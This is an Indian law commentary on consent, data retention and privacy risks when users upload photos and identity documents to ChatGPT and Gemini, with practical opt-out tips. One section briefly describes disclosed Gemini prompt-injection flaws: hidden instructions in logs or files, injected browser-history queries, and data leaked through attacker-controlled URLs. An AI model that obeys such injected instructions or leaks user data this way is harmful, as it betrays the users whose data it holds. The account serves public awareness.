Digital Naivety: Uninformed Consent in the Age of Generative AI

Aali JaiswalLaw

Digital Naivety: Uninformed Consent in the Age of Generative AI

In the past few months, we have seen how social media has been flooded with AI-fuelled trends. There is a long list of such trends, but our focus in this article is the Gemini Red Saree trend. People have been enthusiastically uploading their photos on ChatGPT and Gemini to transport themselves to exotic locations and to add filters that look like professional edits.  This is a familiar pattern: the age-old habit of clicking “I Agree” whenever the option appears on the screen. Not just for aesthetic purposes, people also upload their personal documents to make certain processes quick and hassle-free, or to avoid seeking professional help to save money and time. These habits reveal people’s ignorance of digital safety, blind trust in AI, lack of awareness of governing laws, and the limited accountability of AI companies.

When AI knew too much

For most people, a video by influencer Jhalak Bhawnani served as an alarm. In one of the videos, she talked about her “creepy” experience with Google Gemini. According to the video, she uploaded a picture (that did not show her hand) to the chat to be a part of the viral Red Saree trend. However, the AI-generated result included her left hand with a mole, which startled her, as she indeed has a mole in that exact spot. The incident sparked widespread curiosity and concern: how did the model know that?

The policies of Google Gemini (can be found here, here, here and here) read,

“We also collect the content you create, upload, or receive from others when using our services. This includes… photos and videos you save.”

“This license allows Google to host, reproduce, distribute… modify and create derivative works based on your content.”

This means that users retain ownership but grant the company a broad license for ‘service improvement’. And for the same case, the policies of OpenAI and ChatGPT (can be found here and here) read as:

“We collect Personal Data that you provide in the input… including… images.”

“We may use the Content you provide us to improve our Services, for example, to train the models.”

But they do provide an opt-out option available for training.

Generative AI and Vulnerabilities

In September 2025, a Tenable research disclosed three flaws. On Gemini, three vulnerabilities were discovered. The first one is where an attacker could upload a malicious PDF/text file, and Gemini could interpret hidden instructions to exfiltrate users’ saved prompts or emails. When Gemini Cloud Assist processed and summarised these logs, it treated the malicious content as trusted commands, potentially compromising cloud services or generating phishing links.

The second vulnerability was Session Hijacking via WebSocket. Attackers could insert malicious queries into a victim’s Chrome browser history. When Gemini used this history for search personalisation, it would interpret the injected entries as legitimate user input. Attackers could then use this to leak sensitive information like saved data and location history.

And the third was Data Exfiltration via Rendered Output. This vulnerability allowed an attacker to trick Gemini into making covert outbound HTTP requests to an attacker-controlled server. The attacker could exfiltrate sensitive user data by embedding it in the URL’s query string during the browser’s operation.

OpenAI’s ChatGPT has also been involved in several data leaks. In March 2023, an incident caused by a bug in an open-source library exposed users’ chat histories and some personal information. More recently, Google indexed shared chat links, making some conversations publicly searchable. Additionally, incidents have occurred in which a user’s account was compromised, leading to that user seeing others’ chat histories. OpenAI attributed this to compromised accounts rather than a platform-wide leak.

While regulators in India issued only post-incident advisories on AI safety, no lawsuits or compensation claims were reported from Indian users. OpenAI self-reported globally without any India-specific actions.

Illusion of Consent

Policies of these platforms render Indian law practically unenforceable and inapplicable in practice. Both ChatGPT and Gemini require users to grant worldwide, non-exclusive, royalty-free licenses to reproduce, modify, distribute, and create derivative works from any uploaded content. According to these private companies’ policies, once uploaded, your data can be used indefinitely for AI model training, even if you delete it. This violates Section 5 (purpose limitation) of the Digital Personal Data Protection Act, 2023, as your consent was limited to ‘editing a photo’ and not to having your face or ID used to train global AI systems. For example, your Aadhaar photo could be used to generate deepfakes or synthetic IDs in future outputs, and the process is irreversible, even if you later withdraw consent.

Uploading a tax return or legal document means that your personal financial/legal details become part of the AI’s knowledge base, and potentially be reproduced in future responses to others. OpenAI policy states, “We may use Content… to train the models that power ChatGPT” unless you opt out. Similarly, Gemini Google states, “Google uses your activity… to train generative AI models.”

This is not “free, specific, informed, unconditional and unambiguous” consent as per Section 6(1) of the DPDP Act. The opting-out feature reduces functionality (for example, ChatGPT limits features), effectively coercing consent.

More Risks

AI systems can edit, replicate, or generate fake versions of Aadhaar, PAN, and bank statements, and these can be actively used in fraud. Past breaches, including ChatGPT 2023 and Gemini 2025, demonstrate that these data leaks are real concerns. The policies do not specifically prohibit uploading such documents and could lead to offences under Section 66C (identity theft) and 66D (cheating by personation) of the Information Technology Act, 2000.

When we read the policies carefully, we realise that “Delete” does not mean deleted from AI models. ChatGPT keeps temporary chats for 30 days, reviewed chats for 3 years, and Gemini retains human-reviewed chats for up to 3 years. Hence, even if you delete your account, your data remains in their training datasets. Although Section 12 of the DPDP Act mandates erasure upon withdrawal, this is non-compliant.

A greater risk you might face is that the data is stored outside India. Both ChatGPT and OpenAI process data on US servers and claim “commercially reasonable” protections. US storage means Indian laws can’t enforce access or deletion. In a breach, Indian users would have no direct legal remedy under US law.

If your data is leaked and/or used in fraud, and you subsequently suffer financial loss and legal costs, you will receive a maximum of USD 100 (OpenAI) and USD 200 (Google) under their policies. Hence, there is no meaningful compensation. This may also be void under Indian contract law (unfair terms).

Conclusion: Practical steps to stay safe while using AI tools

To avoid any such legal problems as discussed above, you shall never type or upload documents such as Aadhaar, PAN, Passport, bank statement, credit card statement, salary slip, or legal drafts containing personal information. But if it’s necessary, you can use fake dummy data by changing numbers, blurring faces or typing only the question, asking how to do the task altogether, for example, “How to file ITR-3?”.

You could also change the basic settings by turning off training. Go to ChatGPT → Settings → Data controls → “Improve the model” off and for Gemini, go to Gemini → Activity controls → Gemini Apps Activity off. Or use “Temporary Chat” mode. For ChatGPT: “New chat” → click the three dots → “Temporary chat” and for Gemini: “New chat” → “Turn off memory”.  This way, the data is auto-deleted in 30 days and is never used for training.

A lot of times, you can’t even guess what the dangers of uploading anything or revealing any information about yourself could be, so it’s better that you never reveal anything specific about yourself and never upload your face. The Instagram trends will come and go, but your face will be remembered by these platforms forever. And the easiest mantra to follow is:

If you won’t share it with a stranger on WhatsApp, don’t share it with your AI ‘friend’ either.